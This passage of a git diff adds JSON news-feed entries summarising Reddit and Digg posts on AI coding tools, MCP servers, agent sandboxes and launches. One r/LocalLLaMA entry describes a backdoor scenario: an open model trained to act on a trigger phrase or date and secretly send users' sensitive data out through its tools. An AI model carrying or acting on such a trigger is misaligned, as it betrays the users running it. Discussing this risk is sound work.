+ "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-25T20:34:06.000Z", + "summary": "Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice!", + "category": "ai_tools" + }, + { + "title": "I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T20:52:25.000Z", + "summary": "I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD (\"What Are You Doing?\") is a Claude Code skill. You type `/wayd` and either post a short \"vibe\" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons…", + "category": "ai_tools" + }, + { + "title": "Is AI inference platform really that saturated now? [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-25T17:52:10.000Z", + "summary": "I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated?", + "category": "ai_research" + }, + { + "title": "Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T17:29:28.000Z", + "summary": "I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off…", + "category": "ai_research" + }, + { + "title": "I’m building an open-source decision layer above AI agents [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T16:03:36.000Z", + "summary": "Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning…", + "category": "ai_research" + }, + { + "title": "I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the \"rm -rf /\" risk", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-25T09:01:19.000Z", + "summary": "I've been working with agents for months now, and I haven't found a sandbox environment that \"just works\" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO…", + "category": "ai_models" + }, + { + "title": "We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-25T08:16:51.000Z", + "summary": "Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case.", + "category": "ai_models" + }, + { + "title": "xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss", + "url": "https://www.digg.com/ai/hlcz47lw", + "source": "Digg AI", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T06:00:09.947Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-25T04:19:50.000Z", + "summary": "Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\\_npu dependency on the hot path. Python is only used on the cold path for CPU-side tokenization and image preproces…", + "category": "ai_models" + }, + { + "title": "I shipped a windows desktop app for running local LLMs with a button that turns your \"no thats wrong\" into actual LoRA training data", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T03:59:18.000Z", + "summary": "i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going \"no thats not what i meant\". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi…", + "category": "ai_models" + }, + { + "title": "Could Open Models be trained to secretly go rogue?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-24T22:05:31.000Z", + "summary": "I was discussing with some other folks how safe is to use open weights models from China and the topic of \"trojan horse\" came up. We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote \"switch\" that would change its behavior or inject a different prompt. But would there be any other ways to \"execute order 66\" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). Thoughts?", + "category": "ai_models" + }, + { + "title": "I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.", + "url": "https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-25T05:36:32.000Z", + "summary": "I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. The chat gets saved in the Dichrome proj…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-26.json b/data/news-feed-2026-05-26.json new file mode 100644 index 0000000..bde1ef8 --- /dev/null +++ b/data/news-feed-2026-05-26.json @@ -0,0 +1,283 @@ +{ + "generated": "2026-06-05T00:44:43.764Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-26", + "article_count": 15, + "archived_story_count": 541, + "articles": [ + { + "title": "open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary", + "url": "https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-26T18:29:43.000Z", + "summary": "last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred \"make sure the branch is clean\" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure (\"if the agent calls X, the trace must satisfy Y\"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express \"tests must pass before commit\", \"no two writes to the same file in a session\", or \"max N file edits per session\", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. hard guarantees have to live outside the probabilistic part of the system. how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa…", + "category": "ai_tools" + }, + { + "title": "Built an MCP server so Claude can generate music, images, and video natively. One config block.", + "url": "https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-26T19:14:33.000Z", + "summary": "I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \\- aw\\_generate\\_music (Suno, full songs with lyrics or instrumental) \\- aw\\_generate\\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \\- aw\\_generate\\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\\~/.config/claude/mcp.json or wherever yours lives): { \"mcpServers\": { \"aetherwave\": { \"command\": \"npx\", \"args\": \\[\"-y\", \"@aetherwave-studio/mcp\"\\], \"env\": { \"AW\\_API\\_KEY\": \"aw\\_live\\_YOUR\\_KEY\\_HERE\" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. \"Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin…", + "category": "ai_tools" + }, + { + "title": "Small set of local MCP server installers for home Linux users", + "url": "https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-26T14:39:11.000Z", + "summary": "Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \\`/mcp\\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \\`8001-80…", + "category": "ai_models" + }, + { + "title": "Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode", + "url": "https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-26T14:34:19.000Z", + "summary": "I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you!", + "category": "ai_models" + }, + { + "title": "This is insane.", + "url": "https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-26T13:28:34.000Z", + "summary": "Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every \"context layer\" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti…", + "category": "ai_tools" + }, + { + "title": "Find where claude code burns your tokens", + "url": "https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-26T15:32:11.000Z", + "summary": "I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. Happy to answer technical doubts", + "category": "ai_tools" + }, + { + "title": "Anyone else dread keeping web, Android, and iOS releases in sync?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-26T00:37:17.000Z", + "summary": "I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \\- bump the right versions/build numbers both in build and in game ui \\- create patch notes for every supported language \\- run lint/typecheck/build through \\`npm run verify\\` \\- sync Capacitor after the web build \\- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \\- build an Android AAB and upload it to Google Play \\-…", + "category": "ai_tools" + }, + { + "title": "Claude makes documents into apps", + "url": "https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "tool_update", + "agent_tool" + ], + "importance": 0.7, + "date": "2026-05-26T15:35:15.000Z", + "summary": "# Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. # Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. The docume…", + "category": "ai_tools" + }, + { + "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models", + "url": "https://www.digg.com/ai/5nn022fp?rank=3", + "source": "Digg AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-26T15:24:13.377Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks", + "url": "https://www.digg.com/ai/5nn022fp", + "source": "Digg AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-26T15:24:13.366Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better", + "url": "https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-26T13:41:20.000Z", + "summary": "i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \\~20% context saturation way too often, before doing any actual work. tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on…", + "category": "ai_tools" + }, + { + "title": "I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.", + "url": "https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-26T13:01:47.000Z", + "summary": "I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo…", + "category": "ai_tools" + }, + { + "title": "Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!", + "url": "https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-26T08:41:48.000Z", + "summary": "The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d…", + "category": "ai_tools" + }, + { + "title": "Finally tested an AI video tool that works directly in Claude without setup", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-26T05:19:37.000Z", + "summary": "Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi…", + "category": "ai_tools" + }, + { + "title": "Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event", + "url": "https://x.com/Scobleizer/status/2057868124112982526", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-26T02:23:28.350Z", + "summary": "Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event.", + 